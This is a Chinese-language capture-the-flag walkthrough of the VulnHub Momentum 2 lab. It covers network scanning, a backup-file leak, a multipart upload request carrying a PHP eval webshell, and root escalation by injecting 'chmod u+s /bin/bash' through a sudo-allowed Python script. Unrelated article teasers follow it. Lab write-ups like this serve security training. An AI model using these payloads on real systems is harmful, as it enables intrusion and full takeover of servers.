vulnhub靶场WP Momentum2

目录

靶机安装

IP发现

端口扫描

目录扫描

备份文件扫描

文件上传

查看当前用户

查看所有用户

权限提升

总结


靶机下载地址 : Momentum: 2 ~ VulnHub

靶机安装

打开VMware

导入虚拟机

点击重试,就可以正常导入

右击——设置——修改靶机的网络连接模式是NAT模式——确定——开启虚拟机

按一下e

将ro替换为rw signle init=/bin/bash

替换完之后按 ctrl + x 键进入系统

输入ip a查看网卡名

输入 vi /etc/network/interfaces,按向下箭头键往下翻页,修改网卡

移动光标到你要删除的地方,按x可删除一个字符

修改完毕后按下 :wq! 回车

输入 /etc/init.d/networking restart 重启网卡

IP发现

目的是扫描同网段的机器的IP地址(如果没有得到目标IP就重启靶机,不需要配置之前的操作)

arp-scan -l 

得到了目标的IP地址:192.168.202.148

端口扫描

扫描目标主机开放了什么端口

nmap -p- 192.168.202.148

扫描主机22,80端口都有什么详细的信息

nmap -p22,80 -sT -sC -sV 192.168.202.148

22 端口 --- ssh远程登录的服务(知道用户名的情况下,直接暴力破解)

80 端口 --- http的默认端口

访问192.168.202.148

网页源码提供的信息有限

目录扫描

-u #针对目标站点进行目录扫描

-x 403 #过滤掉状态码是403

dirsearch -u "http://192.168.202.148/" -x 403

得到了如下目录信息

http://192.168.202.148/js/ 
http://192.168.202.148/ajax.php
http://192.168.202.148/css/
http://192.168.202.148/dashboard.html
http://192.168.202.148/img/ 
http://192.168.202.148/manual/ 

main.js的内容如下

大致浏览一下,这大概是一个上传文件的函数,向 ajax.php 发送数据包,响应结果为1则上传成功

访问http://192.168.202.148/dashboard.html

发现一个文件上传的页面,有关于owls

burp抓包,发现只有上传的后缀是 .txt 可以上传成功(在owls目录下),而我们的思路是上传一个.php 的webshell

如果知道 ajax.php的代码,就可以知道为什么.txt可以,.php不可以

尝试扫一下备份文件

备份文件扫描

dirsearch -u "http://192.168.202.148/" -x 403 -f -e .php.bak,.zip,.tar,.7z

发现一个 ajax.php.bak 的文件,下载下来看一下内容

得到了两个信息:

1.有一个Cookie:admin = &G6u@B6uDXMq&Ms大写字母

2.要给目标 POST 一个 secure 值是 cal1d

文件上传

构造数据包

POST /ajax.php HTTP/1.1
Host: 192.168.202.148
Content-Length: 318
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/109.0.5414.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCa0DvSX5z70MIIrp
Accept: */*
Origin: http://192.168.202.148
Referer: http://192.168.44.153/dashboard.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin=&G6u@B6uDXMq&MsR
Connection: close

------WebKitFormBoundaryCa0DvSX5z70MIIrp
Content-Disposition: form-data; name="secure"

val1d
------WebKitFormBoundaryCa0DvSX5z70MIIrp
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_POST[cmd]);?>
------WebKitFormBoundaryCa0DvSX5z70MIIrp--

发现上传成功

查看网站发现文件上传成功

使用webshell管理工具(蚁剑)进行连接

查看当前用户

查看所有用户

cat /etc/passwd

发现一个叫做 athena 的用户

拿第一个flag

权限提升

cat password-reminder.txt

尝试登录到 athena 用户

ssh athena@192.168.202.148
myvulnerableapp*       #([Asterisk]翻译出来是*)

查看用户之前是否执行过什么操作

无发现

查看用户是否具有sudo的权限 sudo -l

发现 athena 可以不使用密码,以root权限执行 /usr/bin/python3 /home/team-tasks/cookie-gen.py

查看一下文件里面是什么

cat /home/team-tasks/cookie-gen.py

发现这个脚本在最后一行执行 cmd, cmd内容是 echo 我们输入的内容 >> log.txt

构造 echo ;chmod u+s /bin/bash

尝试给 /bin/bash 增加 suid 权限

ls -l /bin/bash
sudo /usr/bin/python3 /home/team-tasks/cookie-gen.py
;chmod u+s /bin/bash

发现 /bin/bash 具有了 suid 的权限,所以直接 /bin/bash -p 获取root的会话,拿flag即可

第二个flag

总结

IP发现 arp-scan -l
端口扫描 nmap
目录扫描 dirsearch -u "url" -x 403
备份文件扫描 dirsearch -f -e
大量代码审计 php 文件上传
webshell上传
提权操作

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/652143.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【面试干货】选择排序

【面试干货】选择排序 1、实现思想2、代码实现 &#x1f496;The Begin&#x1f496;点点关注&#xff0c;收藏不迷路&#x1f496; 1、实现思想 选择排序的实现思想是每次从未排序的部分中选择最小的元素&#xff0c;然后将其放到已排序部分的末尾。 具体步骤如下&#xff1…

【VTKExamples::Utilities】第九期 FrameRate

很高兴在雪易的CSDN遇见你 VTK技术爱好者 QQ:870202403 公众号:VTK忠粉 前言 本文分享VTK样例FrameRate,希望对各位小伙伴有所帮助! 感谢各位小伙伴的点赞+关注,小易会继续努力分享,一起进步! 你的点赞就是我的动力(^U^)ノ~YO 1. FrameRate 该样例介绍 如…

Linux-----sed案例练习

1.数据准备 准备数据如下&#xff1a; [rootopenEuler ~]# cat openlab.txt My name is jock. I teach linux. I like play computer game. My qq is 24523452 My website is http://www.xianoupeng.com My website is http://www.xianoupeng.com My website is http://www.…

“提升人工智能大模型智能:策略与挑战“

文章目录 每日一句正能量前言算法创新数据质量与多样性模型架构优化后记 每日一句正能量 失败时可以称为人生财富&#xff0c;成功时可以称为财富人生。 前言 随着人工智能技术的飞速发展&#xff0c;大模型已经成为推动多个领域创新的关键力量。从自然语言处理到图像识别&…

嵌入式进阶——OLED显示器(I2C)

&#x1f3ac; 秋野酱&#xff1a;《个人主页》 &#x1f525; 个人专栏:《Java专栏》《Python专栏》 ⛺️心若有所向往,何惧道阻且长 文章目录 SSD1306I2C版的SSD1306原理图驱动屏幕API的使用软驱动与硬驱动字体制作图形制作 SSD1306 SSD1306是一款OLED显示驱动芯片&#xf…

多个存储权限管理的好处,你get到了吗?

多个存储权限管理是NAS&#xff08;网络附加存储&#xff09;系统中的一个重要功能&#xff0c;它允许管理员对存储在NAS上的文件和文件夹进行细粒度的访问控制。以下是实现多个存储权限管理的关键点&#xff1a; 1.用户和用户组&#xff1a; 创建不同的用户账户和用户组&…

Mybatis——入门

新建 idea 准备 数据库 create table user(id int unsigned primary key auto_increment comment ID,name varchar(100) comment 姓名,age tinyint unsigned comment 年龄,gender tinyint unsigned comment 性别, 1:男, 2:女,phone varchar(11) comment 手机号 ) comment 用…

51-54 Sora能制作动作大片还需要一段时间 | DrivingGaussian:周围动态自动驾驶场景的复合高斯飞溅

24年3月&#xff0c;北大、谷歌和加州大学共同发布了DrivingGaussian: Composite Gaussian Splatting for Surrounding Dynamic Autonomous Driving Scenes。视图合成和可控模拟可以生成自动驾驶的极端场景Corner Case&#xff0c;这些安全关键情况有助于以更低成本验证和增强自…

如何恢复已删除/丢失或未保存的 PDF 文件?

许多用户曾因某些问题删除或丢失 PDF 文件。此外&#xff0c;一些用户在关闭应用程序时未保存 PDF 文件&#xff0c;从而丢失 PDF 文件。您可以尝试一些解决方案来恢复已删除的 PDF 文件、恢复未保存的 PDF 文件&#xff0c;以及在任何其他数据丢失情况下挽救丢失的 PDF 文件。…

【免费Web系列】大家好 ,今天是Web课程的第九天点赞收藏关注,持续更新作品 !

这是Web第一天的课程大家可以传送过去学习 http://t.csdnimg.cn/K547r 部门管理开发 1. 删除部门 1.1 需求分析 删除部门数据。在点击 "删除" 按钮&#xff0c;会根据ID删除部门数据。 了解了需求之后&#xff0c;我们再看看接口文档中&#xff0c;关于删除部门…

js中的作用域和作用域链,你未必能分清,用代码示例告诉你。

有很多小伙伴分不清二者&#xff0c;看了网上教程也是很迷茫&#xff0c;好吧让我告诉你吧。 一、作用域和作用域链 作用域是指在程序中变量和函数的可访问性和可见性范围。作用域决定了在哪些地方可以访问到变量和函数&#xff0c;以及在哪些地方可以对其进行修改和调用。 …

韩顺平0基础学java——第12天

p250-263 this细节 4的补充&#xff1a;意思是不能在成员方法里通过this调用构造器。 补充 引用类型&#xff08;如数组&#xff09;可以是null&#xff0c;相当于记了个名字&#xff0c;还没有开空间。如果数组是{}&#xff0c;则是开了空间&#xff0c;没有放元素进去。 …

Text Control 控件 中 Service Pack 3:MailMerge 支持 SVG 图像

图像的合并方式与报告模板中的合并字段相同。占位符在设计时添加&#xff0c;并与文件、数据库或内存中的数据合并。可以将图像对象添加到具有指定名称的模板中。数据列必须包含字节数组形式的二进制图像数据、System.Drawing.Image 类型的对象、文件名、十六进制或 Base64 编码…

npm install node-sass 安装失败的解决方案:利用国内镜像加速安装

在开发前端项目时&#xff0c;使用Sass作为CSS预处理器是很多开发者的选择。然而&#xff0c;在通过npm安装其Node.js绑定库node-sass时&#xff0c;一些开发者可能会遇到安装失败的问题&#xff0c;尤其是网络原因导致的下载缓慢或中断。本文将指导你如何通过更换为国内镜像源…

其二:使用递归法实现二分搜索

开篇 本文主要是利用递归法来实现一个简单的二分搜索程序。题目来源是《编程珠玑》第4章课后习题3。 问题概要 编写并验证一个递归的二分搜索程序, 并返回t在数组x[0…n-1]中第一次出现的位置。 思路分析 本题的思路与第一版相似&#xff0c;不过不同的是&#xff0c;为确保返回…

全屏后 element-ui 组件不显示

文章目录 问题分析ElementUI 解决方案ElementPlus 解决方案 注意 问题 上篇我们说到如何 将 DIV 全屏展示 在使用将页面中指定的 DIV 全屏展示后&#xff0c;出现全屏后 element-ui 组件不显示&#xff0c;全屏后展示的提示信息是没有的&#xff0c;如下如所示&#xff1a; 全…

C语言之指针详解(5)(含有易错笔试题)

文章目录 一、sizeof和strlen的对比1.1 sizeof1.2 strlen1.3 sizeof 和 strlen 的对比 二、数组和指针笔试题2.1 一维数组2.2 字符数组2.3 二维数组 三、指针运算笔试题3.1 题目13.2 题目23.3 题目33.4 题目43.5 题目53.6 题目63.7 题目7 一、sizeof和strlen的对比 有一个很神…

AS加密技术的实战应用与解析

新书上架~&#x1f447;全国包邮奥~ python实用小工具开发教程http://pythontoolsteach.com/3 欢迎关注我&#x1f446;&#xff0c;收藏下次不迷路┗|&#xff40;O′|┛ 嗷~~ 目录 一、AS加密技术简介 二、AS加密技术的实现过程 1. 生成公钥和私钥 2. 使用公钥加密数据 …

C++ day1 作业练习

整理思维导图 定义自己的命名空间my_sapce&#xff0c;在my_sapce中定义string类型的变量s1&#xff0c;再定义一个函数完成对字符串的逆置。 #include <iostream> #include <cstring>using namespace std; namespace my_space {string s1; }void show() {cout<…

基于springboot的论坛管理系统(含源码+sql+视频导入教程)

&#x1f449;文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1 、功能描述 基于springboot的论坛管理系统3拥有两种角色 管理员&#xff1a;用户管理、公告管理、帖子管理、分类管理、留言管理、系统管理等 用户&#xff1a;登录注册、查看发布帖子等 1.1 背景…